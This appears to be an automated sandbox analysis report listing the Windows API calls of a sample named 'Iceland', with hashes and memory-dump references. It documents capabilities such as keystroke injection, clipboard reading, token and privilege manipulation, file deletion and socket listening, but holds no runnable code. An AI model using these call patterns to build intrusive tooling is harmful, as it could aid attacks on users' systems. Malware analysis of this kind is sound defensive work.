                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,00A8D840), ref: 00A8EAB1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8DC54: FindFirstFileW.KERNEL32(?,?), ref: 00A8DCCB
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00A8DD1B
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00A8DD2C
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8DC54: FindClose.KERNEL32(00000000), ref: 00A8DD43
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A9666E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00A3FC86
                                                                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A7FCB8
                                                                                                                                                                                                                                                                • IsIconic.USER32(00000000), ref: 00A7FCC1
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000009), ref: 00A7FCCE
                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00A7FCD8
                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A7FCEE
                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00A7FCF5
                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A7FD01
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A7FD12
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A7FD1A
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00A7FD22
                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00A7FD25
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A7FD3A
                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00A7FD45
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A7FD4F
                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00A7FD54
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A7FD5D
                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00A7FD62
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A7FD6C
                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00A7FD71
                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00A7FD74
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00A7FD9B
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                • API String ID: 4125248594-2988720461
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A82010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A8205A
                                                                                                                                                                                                                                                                  • Part of subcall function 00A82010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A82087
                                                                                                                                                                                                                                                                  • Part of subcall function 00A82010: GetLastError.KERNEL32 ref: 00A82097
                                                                                                                                                                                                                                                                • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00A81BD2
                                                                                                                                                                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00A81BF4
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00A81C05
                                                                                                                                                                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A81C1D
                                                                                                                                                                                                                                                                • GetProcessWindowStation.USER32 ref: 00A81C36
                                                                                                                                                                                                                                                                • SetProcessWindowStation.USER32(00000000), ref: 00A81C40
                                                                                                                                                                                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00A81C5C
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A81B48), ref: 00A81A20
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A0B: CloseHandle.KERNEL32(?,?,00A81B48), ref: 00A81A35
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                • String ID: $default$winsta0
                                                                                                                                                                                                                                                                • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A81A60
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00A814E7,?,?,?), ref: 00A81A6C
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A814E7,?,?,?), ref: 00A81A7B
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A814E7,?,?,?), ref: 00A81A82
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A81A99
                                                                                                                                                                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A81518
                                                                                                                                                                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A8154C
                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00A81563
                                                                                                                                                                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00A8159D
                                                                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A815B9
                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00A815D0
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00A815D8
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A815DF
                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A81600
                                                                                                                                                                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00A81607
                                                                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A81636
                                                                                                                                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A81658
                                                                                                                                                                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A8166A
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A81691
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A81698
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A816A1
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A816A8
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A816B1
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A816B8
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00A816C4
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A816CB
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81ADF: GetProcessHeap.KERNEL32(00000008,00A814FD,?,00000000,?,00A814FD,?), ref: 00A81AED
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00A814FD,?), ref: 00A81AF4
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00A814FD,?), ref: 00A81B03
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • OpenClipboard.USER32(00ABDCD0), ref: 00A9F586
                                                                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00A9F594
                                                                                                                                                                                                                                                                • GetClipboardData.USER32(0000000D), ref: 00A9F5A0
                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00A9F5AC
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00A9F5E4
                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00A9F5EE
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00A9F619
                                                                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 00A9F626
                                                                                                                                                                                                                                                                • GetClipboardData.USER32(00000001), ref: 00A9F62E
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00A9F63F
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00A9F67F
                                                                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(0000000F), ref: 00A9F695
                                                                                                                                                                                                                                                                • GetClipboardData.USER32(0000000F), ref: 00A9F6A1
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00A9F6B2
                                                                                                                                                                                                                                                                • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00A9F6D4
                                                                                                                                                                                                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A9F6F1
                                                                                                                                                                                                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A9F72F
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00A9F750
                                                                                                                                                                                                                                                                • CountClipboardFormats.USER32 ref: 00A9F771
                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00A9F7B6
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 420908878-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00A97403
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00A97457
                                                                                                                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A97493
                                                                                                                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A974BA
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A974F7
                                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A97524
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                • Opcode ID: 8803d21e3a180ed709273e2f759ce0a2f0e7b29e4a8a4b96c36975c68f7433e2
                                                                                                                                                                                                                                                                • Instruction ID: 8bb4d1c6f3b08c7e2b5b9c1f62d950ce075cdbdb266123e24489413737533e43
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8803d21e3a180ed709273e2f759ce0a2f0e7b29e4a8a4b96c36975c68f7433e2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7D17072518354AFC700EB68D981EAFB7ECAF88704F44492DF585C7292EB74DA44CB62
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00A9A0A8
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00A9A0E6
                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00A9A100
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00A9A118
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00A9A123
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00A9A13F
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00A9A18F
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(00AE7B94), ref: 00A9A1AD
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A9A1B7
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00A9A1C4
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00A9A1D4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                • Opcode ID: 2e9090196863e1a382718490a4704bee864a2c60f48ba70d21a28205d2757bcc
                                                                                                                                                                                                                                                                • Instruction ID: 1788767cd92068342e202623699a778938365938088b78c830758c6ac1610ae6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e9090196863e1a382718490a4704bee864a2c60f48ba70d21a28205d2757bcc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D83115327002497BDF14EFB4DC49ADE77ECAF55320F200662E815E20A1FB70DE818AA1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A94785
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A947B2
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A947E2
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A94803
                                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00A94813
                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A9489A
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A948A5
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A948B0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                • Opcode ID: 6b773da81481c54435bf1847f1e4ada03c0a00c42848d5ade7ecf8a21dca9e27
                                                                                                                                                                                                                                                                • Instruction ID: 9afd0ecc61c581dc1000f468cf307580e0a7cc67e6be4f4ab6d9e40214895faa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b773da81481c54435bf1847f1e4ada03c0a00c42848d5ade7ecf8a21dca9e27
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87319075A0424AAADF20DBA0DC49FEB37BCEF89704F1041B6F509D6061E77096458B64
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00A9A203
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00A9A25E
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00A9A269
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00A9A285
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00A9A2D5
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(00AE7B94), ref: 00A9A2F3
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A9A2FD
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00A9A30A
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00A9A31A
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A8E3B4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                • Opcode ID: b89e962c72357a5d750114c52f953134b34ae6808f9630564ad1b81c7aa31bea
                                                                                                                                                                                                                                                                • Instruction ID: 548a757d5429e2d507267f6fcee0d3acb7520cb7cb172f38071444448689a506
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b89e962c72357a5d750114c52f953134b34ae6808f9630564ad1b81c7aa31bea
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF3112356006597BCF10EFB4EC49ADE77ECAF55324F1041A2E810A70A1EB71DE868A91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AAC10E,?,?), ref: 00AAD415
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD451
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD4C8
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD4FE
                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AAC99E
                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00AACA09
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00AACA2D
                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00AACA8C
                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00AACB47
                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00AACBB4
                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00AACC49
                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00AACC9A
                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00AACD43
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00AACDE2
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00AACDEF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A25851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A255D1,?,?,00A64B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A25871
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8EAB0: GetFileAttributesW.KERNEL32(?,00A8D840), ref: 00A8EAB1
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00A8D9CD
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00A8DA88
                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00A8DA9B
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 00A8DAB8
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A8DAE2
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00A8DAC7,?,?), ref: 00A8DB5D
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?), ref: 00A8DAFE
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00A8DB0F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                                                                • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A82010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A8205A
                                                                                                                                                                                                                                                                  • Part of subcall function 00A82010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A82087
                                                                                                                                                                                                                                                                  • Part of subcall function 00A82010: GetLastError.KERNEL32 ref: 00A82097
                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00A8F249
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00AA1CD3
                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AA1CE0
                                                                                                                                                                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00AA1D17
                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AA1D22
                                                                                                                                                                                                                                                                • closesocket.WSOCK32(00000000), ref: 00AA1D51
                                                                                                                                                                                                                                                                • listen.WSOCK32(00000000,00000005), ref: 00AA1D60
                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AA1D6A
                                                                                                                                                                                                                                                                • closesocket.WSOCK32(00000000), ref: 00AA1D99
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5BD54
